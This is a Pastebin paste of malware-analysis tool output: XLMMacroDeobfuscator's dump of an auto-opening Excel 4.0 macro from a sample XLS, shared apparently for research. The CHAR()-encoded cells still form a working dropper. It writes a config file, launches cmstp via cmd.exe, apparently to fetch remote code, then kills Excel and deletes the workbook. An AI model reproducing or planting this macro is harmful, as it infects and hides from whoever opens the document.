API tools faq
paste
Advertisement
dissectmalware

Extracted Macro

dissectmalware
May 22nd, 2020
486
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.48 KB | None | 0 0
raw download clone embed print report
  1.  
  2. _ _______
  3. |\ /|( \ ( )
  4. ( \ / )| ( | () () |
  5. \ (_) / | | | || || |
  6. ) _ ( | | | |(_)| |
  7. / ( ) \ | | | | | |
  8. ( / \ )| (____/\| ) ( |
  9. |/ \|(_______/|/ \|
  10. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  11. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  12. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  13. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  14. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  15. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  16. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  17. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  18.  
  19.  
  20. XLMMacroDeobfuscator(v 0.1.3) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  21.  
  22. File: C:\Users\user\Downloads\saaaample.xls
  23.  
  24. [Loading Cells]
  25. auto_open: auto_open->Macro1!$A$2
  26. SHEET: Macro1, Macrosheet
  27. CELL:A10 , =RETURN() , 0
  28. CELL:A1 , =ERROR(0.0) , 0
  29. CELL:A8 , =CALL_ADDIN(UIBsfb,0.0,,CHAR(99.0)&CHAR(109.0)&CHAR(100.0)&CHAR(46.0)&CHAR(101.0)&CHAR(120.0)&CHAR(101.0),CHAR(47.0)&CHAR(118.0)&CHAR(32.0)&CHAR(47.0)&CHAR(99.0)&CHAR(32.0)&CHAR(115.0)&CHAR(101.0)&CHAR(116.0)&CHAR(32.0)&CHAR(104.0)&CHAR(51.0)&CHAR(61.0)&CHAR(116.0)&CHAR(105.0)&CHAR(109.0)&CHAR(101.0)&CHAR(115.0)&CHAR(38.0)&CHAR(32.0)&CHAR(99.0)&CHAR(97.0)&CHAR(108.0)&CHAR(108.0)&CHAR(32.0)&CHAR(115.0)&CHAR(101.0)&CHAR(116.0)&CHAR(32.0)&CHAR(113.0)&CHAR(48.0)&CHAR(61.0)&CHAR(37.0)&CHAR(104.0)&CHAR(51.0)&CHAR(58.0)&CHAR(126.0)&CHAR(48.0)&CHAR(44.0)&CHAR(49.0)&CHAR(37.0)&CHAR(38.0)&CHAR(32.0)&CHAR(99.0)&CHAR(97.0)&CHAR(108.0)&CHAR(108.0)&CHAR(32.0)&CHAR(115.0)&CHAR(101.0)&CHAR(116.0)&CHAR(32.0)&CHAR(121.0)&CHAR(56.0)&CHAR(61.0)&CHAR(37.0)&CHAR(104.0)&CHAR(51.0)&CHAR(58.0)&CHAR(126.0)&CHAR(49.0)&CHAR(44.0)&CHAR(49.0)&CHAR(37.0)&CHAR(38.0)&CHAR(32.0)&CHAR(115.0)&CHAR(33.0)&CHAR(113.0)&CHAR(48.0)&CHAR(33.0)&CHAR(97.0)&CHAR(114.0)&CHAR(116.0)&CHAR(32.0)&CHAR(47.0)&CHAR(109.0)&CHAR(105.0)&CHAR(110.0)&CHAR(32.0)&CHAR(34.0)&CHAR(34.0)&CHAR(32.0)&CHAR(119.0)&CHAR(109.0)&CHAR(33.0)&CHAR(121.0)&CHAR(56.0)&CHAR(33.0)&CHAR(99.0)&CHAR(32.0)&CHAR(112.0)&CHAR(114.0)&CHAR(111.0)&CHAR(99.0)&CHAR(101.0)&CHAR(115.0)&CHAR(115.0)&CHAR(32.0)&CHAR(99.0)&CHAR(97.0)&CHAR(108.0)&CHAR(108.0)&CHAR(32.0)&CHAR(99.0)&CHAR(114.0)&CHAR(101.0)&CHAR(97.0)&CHAR(33.0)&CHAR(113.0)&CHAR(48.0)&CHAR(33.0)&CHAR(101.0)&CHAR(32.0)&CHAR(34.0)&CHAR(99.0)&CHAR(109.0)&CHAR(115.0)&CHAR(33.0)&CHAR(113.0)&CHAR(48.0)&CHAR(33.0)&CHAR(112.0)&CHAR(32.0)&CHAR(47.0)&CHAR(110.0)&CHAR(115.0)&CHAR(32.0)&CHAR(47.0)&CHAR(115.0)&CHAR(32.0)&CHAR(47.0)&CHAR(115.0)&CHAR(117.0)&CHAR(32.0)&Yuaf&CHAR(34.0),,0.0), 29
  30. CELL:A4 , =FWRITE(nCWoR,CHAR(91.0)&CHAR(118.0)&CHAR(101.0)&CHAR(114.0)&CHAR(115.0)&CHAR(105.0)&CHAR(111.0)&CHAR(110.0)&CHAR(93.0)&CHAR(13.0)&CHAR(10.0)&CHAR(115.0)&CHAR(105.0)&CHAR(103.0)&CHAR(110.0)&CHAR(97.0)&CHAR(116.0)&CHAR(117.0)&CHAR(114.0)&CHAR(101.0)&CHAR(61.0)&CHAR(36.0)&CHAR(87.0)&CHAR(105.0)&CHAR(78.0)&CHAR(100.0)&CHAR(111.0)&CHAR(119.0)&CHAR(115.0)&CHAR(32.0)&CHAR(78.0)&CHAR(84.0)&CHAR(36.0)&CHAR(13.0)&CHAR(10.0)&CHAR(91.0)&CHAR(68.0)&CHAR(101.0)&CHAR(115.0)&CHAR(116.0)&CHAR(105.0)&CHAR(110.0)&CHAR(97.0)&CHAR(116.0)&CHAR(105.0)&CHAR(111.0)&CHAR(110.0)&CHAR(68.0)&CHAR(105.0)&CHAR(114.0)&CHAR(115.0)&CHAR(93.0)&CHAR(13.0)&CHAR(10.0)&CHAR(101.0)&CHAR(55.0)&CHAR(61.0)&CHAR(48.0)&CHAR(49.0)&CHAR(13.0)&CHAR(10.0)&CHAR(91.0)&CHAR(68.0)&CHAR(101.0)&CHAR(102.0)&CHAR(97.0)&CHAR(117.0)&CHAR(108.0)&CHAR(116.0)&CHAR(73.0)&CHAR(110.0)&CHAR(115.0)&CHAR(116.0)&CHAR(97.0)&CHAR(108.0)&CHAR(108.0)&CHAR(95.0)&CHAR(115.0)&CHAR(105.0)&CHAR(110.0)&CHAR(103.0)&CHAR(108.0)&CHAR(101.0)&CHAR(85.0)&CHAR(115.0)&CHAR(101.0)&CHAR(114.0)&CHAR(93.0)&CHAR(13.0)&CHAR(10.0)&CHAR(85.0)&CHAR(110.0)&CHAR(82.0)&CHAR(101.0)&CHAR(103.0)&CHAR(105.0)&CHAR(115.0)&CHAR(116.0)&CHAR(101.0)&CHAR(114.0)&CHAR(79.0)&CHAR(67.0)&CHAR(88.0)&CHAR(115.0)&CHAR(61.0)&CHAR(98.0)&CHAR(48.0)&CHAR(13.0)&CHAR(10.0)&CHAR(68.0)&CHAR(101.0)&CHAR(108.0)&CHAR(70.0)&CHAR(105.0)&CHAR(108.0)&CHAR(101.0)&CHAR(115.0)&CHAR(61.0)&CHAR(101.0)&CHAR(55.0)&CHAR(13.0)&CHAR(10.0)&CHAR(91.0)&CHAR(98.0)&CHAR(48.0)&CHAR(93.0)&CHAR(13.0)&CHAR(10.0)&CHAR(37.0)&CHAR(49.0)&CHAR(49.0)&CHAR(37.0)&CHAR(92.0)&CHAR(37.0)&CHAR(104.0)&CHAR(57.0)&CHAR(37.0)&CHAR(67.0)&CHAR(114.0)&CHAR(79.0)&CHAR(37.0)&CHAR(113.0)&CHAR(49.0)&CHAR(37.0)&CHAR(106.0)&CHAR(44.0)&CHAR(78.0)&CHAR(73.0)&CHAR(44.0)&CHAR(37.0)&CHAR(105.0)&CHAR(57.0)&CHAR(37.0)&CHAR(37.0)&CHAR(117.0)&CHAR(51.0)&CHAR(37.0)&CHAR(37.0)&CHAR(117.0)&CHAR(51.0)&CHAR(37.0)&CHAR(112.0)&CHAR(37.0)&CHAR(118.0)&CHAR(48.0)&CHAR(37.0)&CHAR(37.0)&CHAR(106.0)&CHAR(52.0)&CHAR(37.0)&CHAR(37.0)&CHAR(106.0)&CHAR(52.0)&CHAR(37.0)), 29
  31. CELL:A9 , =CALL_ADDIN(UIBsfb,0.0,,CHAR(99.0)&CHAR(109.0)&CHAR(100.0)&CHAR(46.0)&CHAR(101.0)&CHAR(120.0)&CHAR(101.0),CHAR(47.0)&CHAR(99.0)&CHAR(32.0)&CHAR(116.0)&CHAR(97.0)&CHAR(115.0)&CHAR(107.0)&CHAR(107.0)&CHAR(105.0)&CHAR(108.0)&CHAR(108.0)&CHAR(32.0)&CHAR(47.0)&CHAR(102.0)&CHAR(32.0)&CHAR(47.0)&CHAR(105.0)&CHAR(109.0)&CHAR(32.0)&CHAR(101.0)&CHAR(120.0)&CHAR(99.0)&CHAR(101.0)&CHAR(108.0)&CHAR(46.0)&CHAR(101.0)&CHAR(120.0)&CHAR(101.0)&CHAR(32.0)&CHAR(32.0)&CHAR(38.0)&CHAR(32.0)&CHAR(112.0)&CHAR(105.0)&CHAR(110.0)&CHAR(103.0)&CHAR(32.0)&CHAR(49.0)&CHAR(50.0)&CHAR(55.0)&CHAR(46.0)&CHAR(48.0)&CHAR(46.0)&CHAR(48.0)&CHAR(46.0)&CHAR(49.0)&CHAR(32.0)&CHAR(45.0)&CHAR(110.0)&CHAR(32.0)&CHAR(51.0)&CHAR(32.0)&CHAR(38.0)&CHAR(32.0)&CHAR(100.0)&CHAR(101.0)&CHAR(108.0)&CHAR(32.0)&CHAR(34.0)&GET.DOCUMENT(2.0)&CHAR(92.0)&GET.WORKBOOK(16.0)&CHAR(34.0),,0.0), 29
  32. CELL:A7 , =REGISTER(CHAR(83.0)&CHAR(104.0)&CHAR(101.0)&CHAR(108.0)&CHAR(108.0)&CHAR(51.0)&CHAR(50.0),CHAR(83.0)&CHAR(104.0)&CHAR(101.0)&CHAR(108.0)&CHAR(108.0)&CHAR(69.0)&CHAR(120.0)&CHAR(101.0)&CHAR(99.0)&CHAR(117.0)&CHAR(116.0)&CHAR(101.0)&CHAR(65.0),CHAR(74.0)&CHAR(74.0)&CHAR(67.0)&CHAR(67.0)&CHAR(67.0)&CHAR(67.0)&CHAR(74.0),"UIBsfb",,1.0,9.0), 0
  33. CELL:A3 , =SET.NAME("nCWoR",FOPEN(Yuaf,3.0)), 0
  34. CELL:A6 , =FCLOSE(nCWoR) , 29
  35. CELL:A2 , =SET.NAME("Yuaf",DIRECTORY()&CHAR(92.0)&CHAR(50.0)&CHAR(52.0)&CHAR(46.0)&CHAR(116.0)&CHAR(120.0)&CHAR(116.0)), 0
  36. CELL:A5 , =FWRITE(nCWoR,CHAR(100.0)&CHAR(111.0)&CHAR(119.0)&CHAR(110.0)&CHAR(108.0)&CHAR(111.0)&CHAR(97.0)&CHAR(100.0)&CHAR(37.0)&CHAR(113.0)&CHAR(55.0)&CHAR(37.0)&CHAR(115.0)&CHAR(104.0)&CHAR(97.0)&CHAR(114.0)&CHAR(101.0)&CHAR(45.0)&CHAR(115.0)&CHAR(112.0)&CHAR(114.0)&CHAR(101.0)&CHAR(97.0)&CHAR(100.0)&CHAR(115.0)&CHAR(104.0)&CHAR(101.0)&CHAR(101.0)&CHAR(116.0)&CHAR(37.0)&CHAR(113.0)&CHAR(55.0)&CHAR(37.0)&CHAR(37.0)&CHAR(100.0)&CHAR(50.0)&CHAR(37.0)&CHAR(47.0)&CHAR(114.0)&CHAR(101.0)&CHAR(97.0)&CHAR(100.0)&CHAR(109.0)&CHAR(101.0)&CHAR(37.0)&CHAR(113.0)&CHAR(55.0)&CHAR(37.0)&CHAR(116.0)&CHAR(120.0)&CHAR(116.0)&CHAR(13.0)&CHAR(10.0)&CHAR(91.0)&CHAR(101.0)&CHAR(55.0)&CHAR(93.0)&CHAR(13.0)&CHAR(10.0)&CHAR(50.0)&CHAR(52.0)&CHAR(37.0)&CHAR(113.0)&CHAR(55.0)&CHAR(37.0)&CHAR(37.0)&CHAR(117.0)&CHAR(51.0)&CHAR(37.0)&CHAR(120.0)&CHAR(37.0)&CHAR(117.0)&CHAR(51.0)&CHAR(37.0)&CHAR(13.0)&CHAR(10.0)&CHAR(91.0)&CHAR(115.0)&CHAR(116.0)&CHAR(114.0)&CHAR(105.0)&CHAR(110.0)&CHAR(103.0)&CHAR(115.0)&CHAR(93.0)&CHAR(13.0)&CHAR(10.0)&CHAR(117.0)&CHAR(51.0)&CHAR(61.0)&CHAR(116.0)&CHAR(13.0)&CHAR(10.0)&CHAR(105.0)&CHAR(57.0)&CHAR(61.0)&CHAR(104.0)&CHAR(13.0)&CHAR(10.0)&CHAR(118.0)&CHAR(48.0)&CHAR(61.0)&CHAR(58.0)&CHAR(13.0)&CHAR(10.0)&CHAR(104.0)&CHAR(57.0)&CHAR(61.0)&CHAR(115.0)&CHAR(13.0)&CHAR(10.0)&CHAR(106.0)&CHAR(52.0)&CHAR(61.0)&CHAR(47.0)&CHAR(13.0)&CHAR(10.0)&CHAR(113.0)&CHAR(49.0)&CHAR(61.0)&CHAR(98.0)&CHAR(13.0)&CHAR(10.0)&CHAR(113.0)&CHAR(55.0)&CHAR(61.0)&CHAR(46.0)&CHAR(13.0)&CHAR(10.0)&CHAR(100.0)&CHAR(50.0)&CHAR(61.0)&CHAR(99.0)&CHAR(111.0)&CHAR(109.0)&CHAR(13.0)&CHAR(10.0)&CHAR(115.0)&CHAR(101.0)&CHAR(114.0)&CHAR(118.0)&CHAR(105.0)&CHAR(99.0)&CHAR(101.0)&CHAR(78.0)&CHAR(97.0)&CHAR(109.0)&CHAR(101.0)&CHAR(61.0)&CHAR(34.0)&CHAR(32.0)&CHAR(34.0)&CHAR(13.0)&CHAR(10.0)&CHAR(115.0)&CHAR(104.0)&CHAR(111.0)&CHAR(114.0)&CHAR(116.0)&CHAR(83.0)&CHAR(118.0)&CHAR(99.0)&CHAR(78.0)&CHAR(97.0)&CHAR(109.0)&CHAR(101.0)&CHAR(61.0)&CHAR(34.0)&CHAR(32.0)&CHAR(34.0)&CHAR(13.0)&CHAR(10.0)&CHAR(102.0)&CHAR(54.0)&CHAR(61.0)&NOW()), 29
  37. time elapsed: 2.2426235675811768
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!